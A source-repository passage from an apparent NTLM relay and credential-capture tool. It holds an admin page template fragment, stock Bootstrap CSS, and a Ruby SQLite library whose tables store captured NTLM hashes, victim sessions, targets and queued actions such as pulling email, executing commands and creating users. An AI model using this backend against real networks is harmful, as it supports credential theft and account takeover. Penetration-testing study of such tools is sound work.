    tgIDgroup namemembers
    <%= tgroups[0]%><%= tgroups[1]%><%db.GetTargets(tgroups[0]).each do |tgm|%><%= tgm[1]%> (<%= tgm[2]%>) delete 198 |
    199 | <%end%>
    204 |
    205 |
    206 |
    207 |
    208 |
    209 |

    Groups:

    210 |
    211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | <%gdb = db.GetGroups 219 | gdb.each do |result| %> 220 | 221 | 224 | 225 | <%end%> 226 | 227 |
    gIDgroupNamemembers
    <%= result[0]%><%= result[1]%><%db.GetGroupMembers(result[0]).each do |inf|%><%if !(inf[1]==nil) then%><%= inf[2]%>\<%= inf[1]%> 222 |
    223 | <%end end%>
    228 |
    229 |
    230 |
    231 | 232 | 249 | 250 | 266 | 267 | 283 | 284 | 313 | 314 | 338 | 339 | 367 | 368 | 377 | 378 | <%= ZFadmingui.Footer%> 379 | -------------------------------------------------------------------------------- /bootstrap/css/bootstrap-responsive.css: -------------------------------------------------------------------------------- 1 | /*! 2 | * Bootstrap Responsive v2.0.4 3 | * 4 | * Copyright 2012 Twitter, Inc 5 | * Licensed under the Apache License v2.0 6 | * http://www.apache.org/licenses/LICENSE-2.0 7 | * 8 | * Designed and built with all the love in the world @twitter by @mdo and @fat. 9 | */ 10 | 11 | .clearfix { 12 | *zoom: 1; 13 | } 14 | 15 | .clearfix:before, 16 | .clearfix:after { 17 | display: table; 18 | content: ""; 19 | } 20 | 21 | .clearfix:after { 22 | clear: both; 23 | } 24 | 25 | .hide-text { 26 | font: 0/0 a; 27 | color: transparent; 28 | text-shadow: none; 29 | background-color: transparent; 30 | border: 0; 31 | } 32 | 33 | .input-block-level { 34 | display: block; 35 | width: 100%; 36 | min-height: 28px; 37 | -webkit-box-sizing: border-box; 38 | -moz-box-sizing: border-box; 39 | -ms-box-sizing: border-box; 40 | box-sizing: border-box; 41 | } 42 | 43 | .hidden { 44 | display: none; 45 | visibility: hidden; 46 | } 47 | 48 | .visible-phone { 49 | display: none !important; 50 | } 51 | 52 | .visible-tablet { 53 | display: none !important; 54 | } 55 | 56 | .hidden-desktop { 57 | display: none !important; 58 | } 59 | 60 | @media (max-width: 767px) { 61 | .visible-phone { 62 | display: inherit !important; 63 | } 64 | .hidden-phone { 65 | display: none !important; 66 | } 67 | .hidden-desktop { 68 | display: inherit !important; 69 | } 70 | .visible-desktop { 71 | display: none !important; 72 | } 73 | } 74 | 75 | @media (min-width: 768px) and (max-width: 979px) { 76 | .visible-tablet { 77 | display: inherit !important; 78 | } 79 | .hidden-tablet { 80 | display: none !important; 81 | } 82 | .hidden-desktop { 83 | display: inherit !important; 84 | } 85 | .visible-desktop { 86 | display: none !important ; 87 | } 88 | } 89 | 90 | @media (max-width: 480px) { 91 | .nav-collapse { 92 | -webkit-transform: translate3d(0, 0, 0); 93 | } 94 | .page-header h1 small { 95 | display: block; 96 | line-height: 18px; 97 | } 98 | input[type="checkbox"], 99 | input[type="radio"] { 100 | border: 1px solid #ccc; 101 | } 102 | .form-horizontal .control-group > label { 103 | float: none; 104 | width: auto; 105 | padding-top: 0; 106 | text-align: left; 107 | } 108 | .form-horizontal .controls { 109 | margin-left: 0; 110 | } 111 | .form-horizontal .control-list { 112 | padding-top: 0; 113 | } 114 | .form-horizontal .form-actions { 115 | padding-right: 10px; 116 | padding-left: 10px; 117 | } 118 | .modal { 119 | position: absolute; 120 | top: 10px; 121 | right: 10px; 122 | left: 10px; 123 | width: auto; 124 | margin: 0; 125 | } 126 | .modal.fade.in { 127 | top: auto; 128 | } 129 | .modal-header .close { 130 | padding: 10px; 131 | margin: -10px; 132 | } 133 | .carousel-caption { 134 | position: static; 135 | } 136 | } 137 | 138 | @media (max-width: 767px) { 139 | body { 140 | padding-right: 20px; 141 | padding-left: 20px; 142 | } 143 | .navbar-fixed-top, 144 | .navbar-fixed-bottom { 145 | margin-right: -20px; 146 | margin-left: -20px; 147 | } 148 | .container-fluid { 149 | padding: 0; 150 | } 151 | .dl-horizontal dt { 152 | float: none; 153 | width: auto; 154 | clear: none; 155 | text-align: left; 156 | } 157 | .dl-horizontal dd { 158 | margin-left: 0; 159 | } 160 | .container { 161 | width: auto; 162 | } 163 | .row-fluid { 164 | width: 100%; 165 | } 166 | .row, 167 | .thumbnails { 168 | margin-left: 0; 169 | } 170 | [class*="span"], 171 | .row-fluid [class*="span"] { 172 | display: block; 173 | float: none; 174 | width: auto; 175 | margin-left: 0; 176 | } 177 | .input-large, 178 | .input-xlarge, 179 | .input-xxlarge, 180 | input[class*="span"], 181 | select[class*="span"], 182 | textarea[class*="span"], 183 | .uneditable-input { 184 | display: block; 185 | width: 100%; 186 | min-height: 28px; 187 | -webkit-box-sizing: border-box; 188 | -moz-box-sizing: border-box; 189 | -ms-box-sizing: border-box; 190 | box-sizing: border-box; 191 | } 192 | .input-prepend input, 193 | .input-append input, 194 | .input-prepend input[class*="span"], 195 | .input-append input[class*="span"] { 196 | display: inline-block; 197 | width: auto; 198 | } 199 | } 200 | 201 | @media (min-width: 768px) and (max-width: 979px) { 202 | .row { 203 | margin-left: -20px; 204 | *zoom: 1; 205 | } 206 | .row:before, 207 | .row:after { 208 | display: table; 209 | content: ""; 210 | } 211 | .row:after { 212 | clear: both; 213 | } 214 | [class*="span"] { 215 | float: left; 216 | margin-left: 20px; 217 | } 218 | .container, 219 | .navbar-fixed-top .container, 220 | .navbar-fixed-bottom .container { 221 | width: 724px; 222 | } 223 | .span12 { 224 | width: 724px; 225 | } 226 | .span11 { 227 | width: 662px; 228 | } 229 | .span10 { 230 | width: 600px; 231 | } 232 | .span9 { 233 | width: 538px; 234 | } 235 | .span8 { 236 | width: 476px; 237 | } 238 | .span7 { 239 | width: 414px; 240 | } 241 | .span6 { 242 | width: 352px; 243 | } 244 | .span5 { 245 | width: 290px; 246 | } 247 | .span4 { 248 | width: 228px; 249 | } 250 | .span3 { 251 | width: 166px; 252 | } 253 | .span2 { 254 | width: 104px; 255 | } 256 | .span1 { 257 | width: 42px; 258 | } 259 | .offset12 { 260 | margin-left: 764px; 261 | } 262 | .offset11 { 263 | margin-left: 702px; 264 | } 265 | .offset10 { 266 | margin-left: 640px; 267 | } 268 | .offset9 { 269 | margin-left: 578px; 270 | } 271 | .offset8 { 272 | margin-left: 516px; 273 | } 274 | .offset7 { 275 | margin-left: 454px; 276 | } 277 | .offset6 { 278 | margin-left: 392px; 279 | } 280 | .offset5 { 281 | margin-left: 330px; 282 | } 283 | .offset4 { 284 | margin-left: 268px; 285 | } 286 | .offset3 { 287 | margin-left: 206px; 288 | } 289 | .offset2 { 290 | margin-left: 144px; 291 | } 292 | .offset1 { 293 | margin-left: 82px; 294 | } 295 | .row-fluid { 296 | width: 100%; 297 | *zoom: 1; 298 | } 299 | .row-fluid:before, 300 | .row-fluid:after { 301 | display: table; 302 | content: ""; 303 | } 304 | .row-fluid:after { 305 | clear: both; 306 | } 307 | .row-fluid [class*="span"] { 308 | display: block; 309 | float: left; 310 | width: 100%; 311 | min-height: 28px; 312 | margin-left: 2.762430939%; 313 | *margin-left: 2.709239449638298%; 314 | -webkit-box-sizing: border-box; 315 | -moz-box-sizing: border-box; 316 | -ms-box-sizing: border-box; 317 | box-sizing: border-box; 318 | } 319 | .row-fluid [class*="span"]:first-child { 320 | margin-left: 0; 321 | } 322 | .row-fluid .span12 { 323 | width: 99.999999993%; 324 | *width: 99.9468085036383%; 325 | } 326 | .row-fluid .span11 { 327 | width: 91.436464082%; 328 | *width: 91.38327259263829%; 329 | } 330 | .row-fluid .span10 { 331 | width: 82.87292817100001%; 332 | *width: 82.8197366816383%; 333 | } 334 | .row-fluid .span9 { 335 | width: 74.30939226%; 336 | *width: 74.25620077063829%; 337 | } 338 | .row-fluid .span8 { 339 | width: 65.74585634900001%; 340 | *width: 65.6926648596383%; 341 | } 342 | .row-fluid .span7 { 343 | width: 57.182320438000005%; 344 | *width: 57.129128948638304%; 345 | } 346 | .row-fluid .span6 { 347 | width: 48.618784527%; 348 | *width: 48.5655930376383%; 349 | } 350 | .row-fluid .span5 { 351 | width: 40.055248616%; 352 | *width: 40.0020571266383%; 353 | } 354 | .row-fluid .span4 { 355 | width: 31.491712705%; 356 | *width: 31.4385212156383%; 357 | } 358 | .row-fluid .span3 { 359 | width: 22.928176794%; 360 | *width: 22.874985304638297%; 361 | } 362 | .row-fluid .span2 { 363 | width: 14.364640883%; 364 | *width: 14.311449393638298%; 365 | } 366 | .row-fluid .span1 { 367 | width: 5.801104972%; 368 | *width: 5.747913482638298%; 369 | } 370 | input, 371 | textarea, 372 | .uneditable-input { 373 | margin-left: 0; 374 | } 375 | input.span12, 376 | textarea.span12, 377 | .uneditable-input.span12 { 378 | width: 714px; 379 | } 380 | input.span11, 381 | textarea.span11, 382 | .uneditable-input.span11 { 383 | width: 652px; 384 | } 385 | input.span10, 386 | textarea.span10, 387 | .uneditable-input.span10 { 388 | width: 590px; 389 | } 390 | input.span9, 391 | textarea.span9, 392 | .uneditable-input.span9 { 393 | width: 528px; 394 | } 395 | input.span8, 396 | textarea.span8, 397 | .uneditable-input.span8 { 398 | width: 466px; 399 | } 400 | input.span7, 401 | textarea.span7, 402 | .uneditable-input.span7 { 403 | width: 404px; 404 | } 405 | input.span6, 406 | textarea.span6, 407 | .uneditable-input.span6 { 408 | width: 342px; 409 | } 410 | input.span5, 411 | textarea.span5, 412 | .uneditable-input.span5 { 413 | width: 280px; 414 | } 415 | input.span4, 416 | textarea.span4, 417 | .uneditable-input.span4 { 418 | width: 218px; 419 | } 420 | input.span3, 421 | textarea.span3, 422 | .uneditable-input.span3 { 423 | width: 156px; 424 | } 425 | input.span2, 426 | textarea.span2, 427 | .uneditable-input.span2 { 428 | width: 94px; 429 | } 430 | input.span1, 431 | textarea.span1, 432 | .uneditable-input.span1 { 433 | width: 32px; 434 | } 435 | } 436 | 437 | @media (min-width: 1200px) { 438 | .row { 439 | margin-left: -30px; 440 | *zoom: 1; 441 | } 442 | .row:before, 443 | .row:after { 444 | display: table; 445 | content: ""; 446 | } 447 | .row:after { 448 | clear: both; 449 | } 450 | [class*="span"] { 451 | float: left; 452 | margin-left: 30px; 453 | } 454 | .container, 455 | .navbar-fixed-top .container, 456 | .navbar-fixed-bottom .container { 457 | width: 1170px; 458 | } 459 | .span12 { 460 | width: 1170px; 461 | } 462 | .span11 { 463 | width: 1070px; 464 | } 465 | .span10 { 466 | width: 970px; 467 | } 468 | .span9 { 469 | width: 870px; 470 | } 471 | .span8 { 472 | width: 770px; 473 | } 474 | .span7 { 475 | width: 670px; 476 | } 477 | .span6 { 478 | width: 570px; 479 | } 480 | .span5 { 481 | width: 470px; 482 | } 483 | .span4 { 484 | width: 370px; 485 | } 486 | .span3 { 487 | width: 270px; 488 | } 489 | .span2 { 490 | width: 170px; 491 | } 492 | .span1 { 493 | width: 70px; 494 | } 495 | .offset12 { 496 | margin-left: 1230px; 497 | } 498 | .offset11 { 499 | margin-left: 1130px; 500 | } 501 | .offset10 { 502 | margin-left: 1030px; 503 | } 504 | .offset9 { 505 | margin-left: 930px; 506 | } 507 | .offset8 { 508 | margin-left: 830px; 509 | } 510 | .offset7 { 511 | margin-left: 730px; 512 | } 513 | .offset6 { 514 | margin-left: 630px; 515 | } 516 | .offset5 { 517 | margin-left: 530px; 518 | } 519 | .offset4 { 520 | margin-left: 430px; 521 | } 522 | .offset3 { 523 | margin-left: 330px; 524 | } 525 | .offset2 { 526 | margin-left: 230px; 527 | } 528 | .offset1 { 529 | margin-left: 130px; 530 | } 531 | .row-fluid { 532 | width: 100%; 533 | *zoom: 1; 534 | } 535 | .row-fluid:before, 536 | .row-fluid:after { 537 | display: table; 538 | content: ""; 539 | } 540 | .row-fluid:after { 541 | clear: both; 542 | } 543 | .row-fluid [class*="span"] { 544 | display: block; 545 | float: left; 546 | width: 100%; 547 | min-height: 28px; 548 | margin-left: 2.564102564%; 549 | *margin-left: 2.510911074638298%; 550 | -webkit-box-sizing: border-box; 551 | -moz-box-sizing: border-box; 552 | -ms-box-sizing: border-box; 553 | box-sizing: border-box; 554 | } 555 | .row-fluid [class*="span"]:first-child { 556 | margin-left: 0; 557 | } 558 | .row-fluid .span12 { 559 | width: 100%; 560 | *width: 99.94680851063829%; 561 | } 562 | .row-fluid .span11 { 563 | width: 91.45299145300001%; 564 | *width: 91.3997999636383%; 565 | } 566 | .row-fluid .span10 { 567 | width: 82.905982906%; 568 | *width: 82.8527914166383%; 569 | } 570 | .row-fluid .span9 { 571 | width: 74.358974359%; 572 | *width: 74.30578286963829%; 573 | } 574 | .row-fluid .span8 { 575 | width: 65.81196581200001%; 576 | *width: 65.7587743226383%; 577 | } 578 | .row-fluid .span7 { 579 | width: 57.264957265%; 580 | *width: 57.2117657756383%; 581 | } 582 | .row-fluid .span6 { 583 | width: 48.717948718%; 584 | *width: 48.6647572286383%; 585 | } 586 | .row-fluid .span5 { 587 | width: 40.170940171000005%; 588 | *width: 40.117748681638304%; 589 | } 590 | .row-fluid .span4 { 591 | width: 31.623931624%; 592 | *width: 31.5707401346383%; 593 | } 594 | .row-fluid .span3 { 595 | width: 23.076923077%; 596 | *width: 23.0237315876383%; 597 | } 598 | .row-fluid .span2 { 599 | width: 14.529914530000001%; 600 | *width: 14.4767230406383%; 601 | } 602 | .row-fluid .span1 { 603 | width: 5.982905983%; 604 | *width: 5.929714493638298%; 605 | } 606 | input, 607 | textarea, 608 | .uneditable-input { 609 | margin-left: 0; 610 | } 611 | input.span12, 612 | textarea.span12, 613 | .uneditable-input.span12 { 614 | width: 1160px; 615 | } 616 | input.span11, 617 | textarea.span11, 618 | .uneditable-input.span11 { 619 | width: 1060px; 620 | } 621 | input.span10, 622 | textarea.span10, 623 | .uneditable-input.span10 { 624 | width: 960px; 625 | } 626 | input.span9, 627 | textarea.span9, 628 | .uneditable-input.span9 { 629 | width: 860px; 630 | } 631 | input.span8, 632 | textarea.span8, 633 | .uneditable-input.span8 { 634 | width: 760px; 635 | } 636 | input.span7, 637 | textarea.span7, 638 | .uneditable-input.span7 { 639 | width: 660px; 640 | } 641 | input.span6, 642 | textarea.span6, 643 | .uneditable-input.span6 { 644 | width: 560px; 645 | } 646 | input.span5, 647 | textarea.span5, 648 | .uneditable-input.span5 { 649 | width: 460px; 650 | } 651 | input.span4, 652 | textarea.span4, 653 | .uneditable-input.span4 { 654 | width: 360px; 655 | } 656 | input.span3, 657 | textarea.span3, 658 | .uneditable-input.span3 { 659 | width: 260px; 660 | } 661 | input.span2, 662 | textarea.span2, 663 | .uneditable-input.span2 { 664 | width: 160px; 665 | } 666 | input.span1, 667 | textarea.span1, 668 | .uneditable-input.span1 { 669 | width: 60px; 670 | } 671 | .thumbnails { 672 | margin-left: -30px; 673 | } 674 | .thumbnails > li { 675 | margin-left: 30px; 676 | } 677 | .row-fluid .thumbnails { 678 | margin-left: 0; 679 | } 680 | } 681 | 682 | @media (max-width: 979px) { 683 | body { 684 | padding-top: 0; 685 | } 686 | .navbar-fixed-top, 687 | .navbar-fixed-bottom { 688 | position: static; 689 | } 690 | .navbar-fixed-top { 691 | margin-bottom: 18px; 692 | } 693 | .navbar-fixed-bottom { 694 | margin-top: 18px; 695 | } 696 | .navbar-fixed-top .navbar-inner, 697 | .navbar-fixed-bottom .navbar-inner { 698 | padding: 5px; 699 | } 700 | .navbar .container { 701 | width: auto; 702 | padding: 0; 703 | } 704 | .navbar .brand { 705 | padding-right: 10px; 706 | padding-left: 10px; 707 | margin: 0 0 0 -5px; 708 | } 709 | .nav-collapse { 710 | clear: both; 711 | } 712 | .nav-collapse .nav { 713 | float: none; 714 | margin: 0 0 9px; 715 | } 716 | .nav-collapse .nav > li { 717 | float: none; 718 | } 719 | .nav-collapse .nav > li > a { 720 | margin-bottom: 2px; 721 | } 722 | .nav-collapse .nav > .divider-vertical { 723 | display: none; 724 | } 725 | .nav-collapse .nav .nav-header { 726 | color: #999999; 727 | text-shadow: none; 728 | } 729 | .nav-collapse .nav > li > a, 730 | .nav-collapse .dropdown-menu a { 731 | padding: 6px 15px; 732 | font-weight: bold; 733 | color: #999999; 734 | -webkit-border-radius: 3px; 735 | -moz-border-radius: 3px; 736 | border-radius: 3px; 737 | } 738 | .nav-collapse .btn { 739 | padding: 4px 10px 4px; 740 | font-weight: normal; 741 | -webkit-border-radius: 4px; 742 | -moz-border-radius: 4px; 743 | border-radius: 4px; 744 | } 745 | .nav-collapse .dropdown-menu li + li a { 746 | margin-bottom: 2px; 747 | } 748 | .nav-collapse .nav > li > a:hover, 749 | .nav-collapse .dropdown-menu a:hover { 750 | background-color: #222222; 751 | } 752 | .nav-collapse.in .btn-group { 753 | padding: 0; 754 | margin-top: 5px; 755 | } 756 | .nav-collapse .dropdown-menu { 757 | position: static; 758 | top: auto; 759 | left: auto; 760 | display: block; 761 | float: none; 762 | max-width: none; 763 | padding: 0; 764 | margin: 0 15px; 765 | background-color: transparent; 766 | border: none; 767 | -webkit-border-radius: 0; 768 | -moz-border-radius: 0; 769 | border-radius: 0; 770 | -webkit-box-shadow: none; 771 | -moz-box-shadow: none; 772 | box-shadow: none; 773 | } 774 | .nav-collapse .dropdown-menu:before, 775 | .nav-collapse .dropdown-menu:after { 776 | display: none; 777 | } 778 | .nav-collapse .dropdown-menu .divider { 779 | display: none; 780 | } 781 | .nav-collapse .navbar-form, 782 | .nav-collapse .navbar-search { 783 | float: none; 784 | padding: 9px 15px; 785 | margin: 9px 0; 786 | border-top: 1px solid #222222; 787 | border-bottom: 1px solid #222222; 788 | -webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1); 789 | -moz-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1); 790 | box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1); 791 | } 792 | .navbar .nav-collapse .nav.pull-right { 793 | float: none; 794 | margin-left: 0; 795 | } 796 | .nav-collapse, 797 | .nav-collapse.collapse { 798 | height: 0; 799 | overflow: hidden; 800 | } 801 | .navbar .btn-navbar { 802 | display: block; 803 | } 804 | .navbar-static .navbar-inner { 805 | padding-right: 10px; 806 | padding-left: 10px; 807 | } 808 | } 809 | 810 | @media (min-width: 980px) { 811 | .nav-collapse.collapse { 812 | height: auto !important; 813 | overflow: visible !important; 814 | } 815 | } 816 | -------------------------------------------------------------------------------- /lib/zfdb.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | #encoding: ASCII-8BIT 3 | =begin 4 | database library 5 | =end 6 | require 'rubygems' 7 | gem 'sqlite3', '1.3.6' #wtf ruby 1.92 8 | require 'sqlite3' 9 | 10 | module ZFdb 11 | class DB 12 | attr_accessor :db 13 | def initialize 14 | if !(File::exists?(DBFile)) then 15 | puts "No DB Exists yet. Creating One!" 16 | @db = SQLite3::Database.new(DBFile) 17 | @db.execute " 18 | CREATE TABLE users ( 19 | uid INTEGER PRIMARY KEY AUTOINCREMENT, 20 | uname VARCHAR(256), 21 | udomain VARCHAR(64), 22 | ufirstseen TIMESTAMP DEFAULT (datetime('now','localtime')) 23 | );" 24 | @db.execute" INSERT INTO users ('udomain','uname') VALUES ('ZACKATTACK','ZACKATTACK')" 25 | @db.execute " 26 | CREATE TABLE authsessions ( 27 | authsessionid INTEGER PRIMARY KEY AUTOINCREMENT, 28 | userid INTEGER, 29 | hostname VARCHAR(64), 30 | timestamp TIMESTAMP DEFAULT (datetime('now','localtime')), 31 | updatetimestamp TIMESTAMP DEFAULT (datetime('now','localtime')), 32 | osid INTEGER DEFAULT 0, 33 | ipaddr VARCHAR(16), 34 | reqpath VARCHAR(256), 35 | reqactive BOOLEAN, 36 | method INTEGER DEFAULT 0, 37 | type1 BLOB 38 | );" 39 | @db.execute " 40 | CREATE TABLE hashes ( 41 | id INTEGER PRIMARY KEY AUTOINCREMENT, 42 | uid INTEGER, 43 | schal VARCHAR(32), 44 | ntlmhash VARCHAR, 45 | lmhash VARCHAR, 46 | type3resp BLOB, 47 | timeseen TIMESTAMP DEFAULT (datetime('now','localtime')), 48 | authsessionid INTEGER DEFAULT 0 49 | );" 50 | @db.execute " 51 | CREATE TABLE os ( 52 | id INTEGER PRIMARY KEY AUTOINCREMENT, 53 | osname VARCHAR(256) 54 | );" 55 | @db.execute " 56 | CREATE TABLE groups ( 57 | gid INTEGER PRIMARY KEY AUTOINCREMENT, 58 | groupname VARCHAR 59 | );" 60 | @db.execute " 61 | CREATE TABLE groupmembers ( 62 | gid INTEGER, 63 | uid INTEGER 64 | );" 65 | @db.execute " 66 | CREATE TABLE targets ( 67 | tid INTEGER PRIMARY KEY AUTOINCREMENT, 68 | tname VARCHAR, 69 | tipaddr VARCHAR(16), 70 | tpriority INTEGER DEFAULT 50 71 | );" 72 | @db.execute " 73 | CREATE TABLE tgroups ( 74 | tgid INTEGER PRIMARY KEY AUTOINCREMENT, 75 | tgname VARCHAR, 76 | tgnotes BLOB 77 | );" 78 | @db.execute " 79 | CREATE TABLE tgroupmembers ( 80 | tgid INTEGER, 81 | tid INTEGER 82 | );" 83 | @db.execute " 84 | CREATE TABLE actions ( 85 | aid INTEGER PRIMARY KEY AUTOINCREMENT, 86 | apriority INTEGER DEFAULT 50, 87 | aname VARCHAR, 88 | anotes VARCHAR, 89 | moduleid INTEGER, 90 | aalltargets BOOLEAN, 91 | aallusers BOOLEAN 92 | );" 93 | @db.execute " 94 | CREATE TABLE aitem ( 95 | aitemid INTEGER PRIMARY KEY AUTOINCREMENT, 96 | aid INTEGER, 97 | aipriority INTEGER DEFAULT 50, 98 | aitemact INTEGER, 99 | aitemdetail VARCHAR, 100 | moduleid INTEGER 101 | )" 102 | @db.execute " 103 | CREATE TABLE modules ( 104 | moduleid INTEGER PRIMARY KEY, 105 | moduleName VARCHAR, 106 | moduleNotes BLOB, 107 | modulefxn VARCHAR 108 | );" 109 | @db.execute "INSERT INTO modules (moduleid,moduleName,moduleNotes,modulefxn) VALUES (1,'Exchange Web Services','moduleNotes','ZFClient::EWS')" 110 | @db.execute "INSERT INTO modules (moduleid,moduleName,moduleNotes,modulefxn) VALUES (2,'SMB','moduleNotes','ZFClient::Smbenum')" 111 | @db.execute "INSERT INTO modules (moduleid,moduleName,moduleNotes,modulefxn) VALUES (3,'LDAP','moduleNotes','ZFClient::Ldap')" 112 | @db.execute "INSERT INTO modules (moduleid,moduleName,moduleNotes,modulefxn) VALUES (4,'MSSQL','moduleNotes','ZFClient::Mssql')" 113 | @db.execute "INSERT INTO modules (moduleid,moduleName,moduleNotes,modulefxn) VALUES (5,'Sharepoint','moduleNotes','ZFClient::Sharepoint')" 114 | @db.execute " 115 | CREATE TABLE agroup ( 116 | aid INTEGER, 117 | gid INTEGER, 118 | agpriority INTEGER 119 | );" 120 | @db.execute " 121 | CREATE TABLE atgroup ( 122 | aid INTEGER, 123 | tgid INTEGER, 124 | atgpriority INTEGER 125 | );" 126 | @db.execute " 127 | CREATE TABLE aresults ( 128 | aresid INTEGER PRIMARY KEY AUTOINCREMENT, 129 | aid INTEGER, 130 | tid INTEGER, 131 | uid INTEGER, 132 | authsessionid INTEGER DEFAULT 0, 133 | responsecode INTEGER, 134 | response BLOB 135 | );" 136 | @db.execute " 137 | CREATE TABLE airesults ( 138 | airesid INTEGER PRIMARY KEY AUTOINCREMENT, 139 | uid INTEGER, 140 | tid INTEGER, 141 | aiteimid INTEGER, 142 | aistatus INTEGER, 143 | ainotes VARCHAR)" 144 | @db.execute " 145 | CREATE TABLE apireq ( 146 | reqid INTEGER PRIMARY KEY AUTOINCREMENT, 147 | uid INTEGER, 148 | type2 BLOB, 149 | type3 BLOB, 150 | status INTEGER DEFAULT 0);" 151 | @db.execute " 152 | CREATE TABLE aitemact ( 153 | aitemactid INTEGER, 154 | moduleid INTEGER, 155 | aitemdesc VARCHAR)" 156 | @db.execute "INSERT INTO aitemact (aitemactid,moduleid,aitemdesc) VALUES (1,1,'Pull Emails')" 157 | @db.execute "INSERT INTO aitemact (aitemactid,moduleid,aitemdesc) VALUES (1,2,'Pull Calendar')" 158 | @db.execute "INSERT INTO aitemact (aitemactid,moduleid,aitemdesc) VALUES (1,3,'Pull Contacts')" 159 | @db.execute "INSERT INTO aitemact (aitemactid,moduleid,aitemdesc) VALUES (1,4,'Add Email Rule')" 160 | @db.execute "INSERT INTO aitemact (aitemactid,moduleid,aitemdesc) VALUES (2,1,'Enum Users')" 161 | @db.execute "INSERT INTO aitemact (aitemactid,moduleid,aitemdesc) VALUES (2,2,'Execute Command')" 162 | @db.execute "INSERT INTO aitemact (aitemactid,moduleid,aitemdesc) VALUES (2,3,'Create User')" 163 | @db.execute "INSERT INTO aitemact (aitemactid,moduleid,aitemdesc) VALUES (2,4,'Add User To Group')" 164 | @db.execute "INSERT INTO aitemact (aitemactid,moduleid,aitemdesc) VALUES (3,1,'Enum Users')" 165 | @db.execute "INSERT INTO aitemact (aitemactid,moduleid,aitemdesc) VALUES (3,2,'Add User to Group')" 166 | @db.execute "INSERT INTO aitemact (aitemactid,moduleid,aitemdesc) VALUES (3,3,'Change User Password')" #requires ssl 167 | @db.execute "INSERT INTO aitemact (aitemactid,moduleid,aitemdesc) VALUES (3,10,'Enum All Users and Groups')" 168 | 169 | else 170 | @db = SQLite3::Database.open(DBFile) 171 | end 172 | @db.results_as_hash 173 | end 174 | 175 | def Getuserid(username,domain) 176 | username = username.upcase 177 | domain = domain.upcase 178 | @db.execute("SELECT uid FROM users WHERE uname = ? and udomain = ?",username,domain) do |woof| 179 | return woof[0] #TODO check on ruby1.9 180 | end 181 | @db.execute("INSERT INTO users('uname','udomain') VALUES (?,?);" ,username,domain) 182 | return @db.last_insert_row_id 183 | end 184 | def GetUserFromId(uid) 185 | return @db.exeuseridcute("SELECT uname,udomain FROM users WHERE uid = ? LIMIT 1",uid)[0] 186 | end 187 | 188 | def Getosid(os) 189 | @db.execute("SELECT id FROM os WHERE osname = ?;",os) do |woof| 190 | return woof 191 | end 192 | @db.execute("INSERT INTO os ('osname') VALUES (?) ",os) 193 | return @db.last_insert_row_id 194 | end 195 | 196 | def Newsession(userid=0,hostname="UNKNOWN",osid=0,ipaddr="0.0.0.0",method=0,path="/UNKNOWN") 197 | @db.execute("INSERT INTO authsessions ('userid','hostname','osid','ipaddr','method','reqpath','reqactive') VALUES(?,?,?,?,?,?,1)",userid,hostname,osid,ipaddr,method,path) 198 | sessionid = @db.last_insert_row_id 199 | return sessionid 200 | end 201 | def Setsessionpath(sessid,path) 202 | @db.execute("UPDATE authsessions SET 'reqpath'=? WHERE authsessionid=?",path,sessid) 203 | end 204 | def Endsession(sessionid) 205 | @db.execute("UPDATE authsessions SET 'reqactive'=0 , 'updatetimestamp' = (datetime('now','localtime')) WHERE authsessionid=?",sessionid ) 206 | end 207 | def close() 208 | @db.close 209 | end 210 | def GetActiveSessions 211 | final = Hash.new 212 | @db.execute("SELECT * FROM authsessions LEFT JOIN users ON authsessions.userid=users.uid LEFT JOIN os ON authsessions.osid = os.id WHERE reqactive=1 GROUP BY uid ORDER BY authsessionid DESC") do |res| 213 | final[res[0]] = { :username => res[12], 214 | :userid => res[1], 215 | :domain => res[13], 216 | :starttime => res[3], 217 | :hostname => res[2], 218 | :sessionfirstseen => res[3], 219 | :userfirstseen => res[14], 220 | :path => res[7], 221 | :ip => res[6], 222 | :os => res[14], 223 | :method => res[9] } 224 | end 225 | return final 226 | end 227 | def ClearActiveSessions(sessid=false) 228 | return @db.execute("UPDATE authsessions SET 'reqactive'=0") 229 | end 230 | 231 | def StoreHash(userid,lmhash,ntlmhash,schal="1122334455667788",authsessionid="0",type3resp="") 232 | @db.execute("INSERT INTO hashes ('uid','schal','lmhash','ntlmhash','type3resp','authsessionid') VALUES (?,?,?,?,?,?)",userid,schal,lmhash.unpack("H*"),ntlmhash.unpack("H*"),type3resp,authsessionid) 233 | end 234 | 235 | def GetHashes(userid) 236 | final = Hash.new 237 | @db.execute("SELECT * FROM hashes WHERE uid = ?",userid) do |res| 238 | final[res[0]] = res 239 | end 240 | return final 241 | end 242 | 243 | def GetTodoItem(uid) 244 | # ugh, here goes the crazy querypalooza 245 | @db.results_as_hash = true 246 | res= @db.execute("SELECT users.*, targets.* FROM 247 | (SELECT users.*, actions.* 248 | FROM `users` 249 | LEFT JOIN groupmembers on groupmembers.uid = users.uid 250 | LEFT JOIN groups ON groups.gid = groupmembers.gid 251 | LEFT JOIN agroup ON agroup.gid = groups.gid 252 | LEFT JOIN actions ON actions.aid = agroup.aid 253 | WHERE (users.uid = ?) 254 | OR (users.uname='ZACKATTACK' AND users.udomain='ZACKATTACK') 255 | GROUP BY actions.aid ) as users 256 | LEFT JOIN modules ON modules.moduleid = users.moduleid 257 | LEFT JOIN atgroup ON atgroup.aid = users.aid 258 | LEFT JOIN tgroups ON atgroup.tgid = tgroups.tgid 259 | LEFT JOIN tgroupmembers ON tgroupmembers.tgid = atgroup.tgid 260 | LEFT JOIN targets ON tgroupmembers.tid = targets.tid 261 | LEFT JOIN aresults ON users.aid = aresults.aid 262 | AND ( ( (users.aalltargets =1 AND users.aallusers =1) AND (aresults.tid = tgroupmembers.tid AND (aresults.uid = users.uid OR (users.uname='ZACKATTACK' AND users.udomain='ZACKATTACK') )) ) 263 | OR ((users.aalltargets =1 AND users.aallusers =0) AND ((aresults.tid = tgroupmembers.tid AND aresults.responsecode = 1) OR (aresults.tid = tgroupmembers.tid AND (aresults.uid = users.uid OR (users.uname='ZACKATTACK' AND users.udomain='ZACKATTACK')))) ) 264 | OR ((users.aalltargets =0 AND users.aallusers =1) AND ((aresults.uid = users.uid AND aresults.responsecode = 1) OR (aresults.tid = tgroupmembers.tid 